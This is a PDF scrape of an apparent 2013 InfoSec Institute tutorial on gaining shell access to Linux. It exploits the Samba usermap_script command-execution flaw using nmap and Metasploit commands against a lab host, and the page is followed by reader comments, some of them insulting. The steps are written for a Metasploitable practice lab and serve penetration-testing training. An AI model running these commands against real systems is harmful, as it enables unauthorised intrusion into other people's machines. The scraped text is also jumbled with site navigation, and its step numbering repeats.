Hacking and Gaining Access To Linux by Exploiting SAMBA Service - InfoSec Institute

6/30/2014 Hacking and Gaining Access to Linux by Exploiting SAMBA Service - InfoSec Institute
http://resources.infosecinstitute.com/hacking-and-gaining-access-to-linux-by-exploiting-samba-service/ 1/8
877.791.9571 |
HackingandGainingAccessto
LinuxbyExploitingSAMBA
Service

2

Tweet
36
25
Like

Step 1) First, we need to find out the ports and services running on the target system. To
find the open ports and services, the command is:
Download&
Resources
Sign up for our newsletter to get
the latest updates.
SUBMIT
ViewourFREEmini-
courses!
SIGN UP NOW
Discounted
Boot
Camps
SIGN UP NOW
21
Share
Home Contri butors Arti cl es Mi ni Courses Downl oads Courses
Schedul e About
Command: nmap -sS -Pn -A 192.168.2.142
Step 2: Once you find the open ports and service like the samba port and service ready,
get set for sending an exploit through that port to create a meterpreter session. To
perform this attack, you need to open metasploit.
Step 3: Once you open metasploit, first we need to find the version of samba
Command: -msf> search scanner/samba
(This command used to finding the scanner parameter to find samba version)
Step 3: Once you find the scanners to find the samba version of the target, use the
scanner parameter.
Command: msf> use auxiliary/scanner/smb/smb_version
(This command is used to set the scanner parameter)
Command 2: msfauxiliary(smb_version) > set RHOSTS 192.168.2.142
(This command is used to set the IPaddress of the remote host of which you need to find
the version)
Command 3: exploit
By V.P. Prabhakaran | February 4th, 2013 | Hacking | 13 Comments
Step 3: After finding the samba version, perform an attack and gain access to the linux
system with the help of the Meterpertersession
Command: msf> use exploit/multi/samba/usermap_script
This is the exploit that we need to select to gain access to system
Command: msf exploit(usermap_script) > set RHOST 192.168.2.142
Want to learn more?? The InfoSec Institute Ethical Hacking
course goes in-depth into the techniques used by malicious,
black hat hackers with attention getting lectures and hands-
on lab exercises. While these hacking skills can be used for
malicious purposes, this class teaches you how to use the
same hacking techniques to perform a white-hat, ethical hack,
on your organization. You leave with the ability to
quantitatively assess and measure threats to information
assets; and discover where your organization is most
vulnerable to black hat hackers. Some features of this course
include:
Dual Certification - CEH and CPT
5 days of Intensive Hands-On Labs
Expert Instruction
CTF exercises in the evening
Most up-to-date proprietary courseware available
VIEW ETHICAL HACKING
ShareThisStory,ChooseYourPlatform!
AbouttheAuthor:V.P.Prabhakaran
13Comments
V.P. Prabhakaran is a highly-experienced security pro, having more then
7 years experience as Senior Information Security Consultant at Koenig
Solutions. Mr. Prabhakaran trains and provides consultancy to
professionals for Computer Hacking, Forensic Security and Firewalls.
He is certified in CEH, ECSA, ECSS, CHFI, EDRP ECIH, CEI, OSSTMM (OPST and OPSA)
ISECOM Trainer MCT and CEI.
Pousen February 5, 2013 at 6:59 am - Reply
Id say a bit weak.
You dont explain which systems would be vulnerable, under which
vulnerability or whether it is going to work or not.
Youri February 5, 2013 at 8:31 am - Reply
Such a pussy explaination. The title should be A beginner on how to
exploit SAMBA using Backtrack. 7 years experience should give more
details. From scratch to PoC. Instead of using others people exploit, you should write
your own. I guess you dont have such a knowledge!
v.p.prabhakaran February 5, 2013 at 10:00 am - Reply
i target the metasploitable lab which is used for your penetration testing
skills its is only for education purpose
v.p.prabhakaran February 5, 2013 at 10:02 am - Reply
i am very pratical guy and i jus shared the pratical in which i exploited the
vulnerablity of samba 3.0
This module exploits a command execution vulerability in Samba versions 3.0.20
through 3.0.25rc3 when using the non-default username map script configuration
option. By specifying a username containing shell meta characters, attackers can
execute arbitrary commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication
v.p.prabhakaran February 5, 2013 at 10:40 pm - Reply
@youri its not abt exp its all about the information what i am trying to
exchange .don,t be rude be chill bro
Prosun February 6, 2013 at 12:18 pm - Reply
@youri people like you are absolute crap and jelaous of others. Can never
appreciate anyones efforts. Critisizm has to be done, but there must be
some way. what can we expect from big F*** like Youri???
@ v.p.prabhakaran keep the good work. Nice consize explanation.
@prosun thanks mate they don,t respect the inforamtion who delivers
Ryan adams February 20, 2013 at 6:15 am - Reply
Command tips so effective and it will really help us to operating to this
strategiesso thanks for blogger to sharing it.
http://www.sintre.com/index.php/about-us
@RYAN thnx
Jose Marquez June 4, 2013 at 11:51 am - Reply
It was a good read and I appreciate the information exchange!!! Keep it up,
you do have a fan or two
Vladmir November 26, 2013 at 9:46 am - Reply
Its easy to talk bad things about others and forget your own ass
LeaveAComment
Name(required) Email(required) Website
Prabahakaran Nair shared a very important knowledge about a vulnerability in samba and
you guys return with
offensive words theres no even respect for others, I would say thanks for sharing this
with us and dont worry about those PACOVIOS
saati December 11, 2013 at 5:59 am - Reply
I followed each and every step mentioned above in a virtual environment
but i,m unable exploit .
At last step it showing message like
Exploit completed but no session created.
Please help me in this.
prabh January 8, 2014 at 12:26 pm - Reply
@sati will u using metasploitable lab ?
Comment...
POST COMMENT
1 + = six
ARCHIVES
Select Month
POPULARSEARCH
TERMS
agile android
application
security App Security
bootcamp certifications
CISA CISM CISSP
compliance crackme ethical
hacking exploit development
feature featured
forensics general
security
hacking how-to human
resources infosecdocs
interview iphone IT
Auditing java linux
malware malware analysis
management management
compliance and auditing nmap
penetration testing
reverse
engineering
reversing scada security
security awareness social
media sql injection TOR
training vulnerabilities
vulnerability wapt
wordpress
RECENTPOSTS
Public Key Infrastructure (PKI)
in the Cloud
Key Elements of an E-mail
Retention Policy
Computer Hacking Forensic
Investigator (CHFI) Salary
Average CAPM Salary 2014
Understanding DNS Sinkholes
A weapon against malware
Dive into Microsoft DBG API
Extending Debuggers
The Ramp with 5 Levels: Top
50 Information Security
Interview Questions
Network Time Protocol (NTP):
Threats and Countermeasures
Domain Generation Algorithm
(DGA)
SEARCHTHISSITE
Search...
LIKEUSONFACEBOOK
==STAYUPTODATE
InfoSec Institute
10,073 Like
Copyright 2012 - InfoSec Institute | All Rights Reserved

Hacking and Gaining Access To Linux by Exploiting SAMBA Service - InfoSec Institute

Încărcat de

Informații document

Descriere originală:

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Hacking and Gaining Access To Linux by Exploiting SAMBA Service - InfoSec Institute

Încărcat de

Drepturi de autor:

Formate disponibile

6/30/2014 Hacking and Gaining Access to Linux by Exploiting SAMBA Service - InfoSec Institute

S-ar putea să vă placă și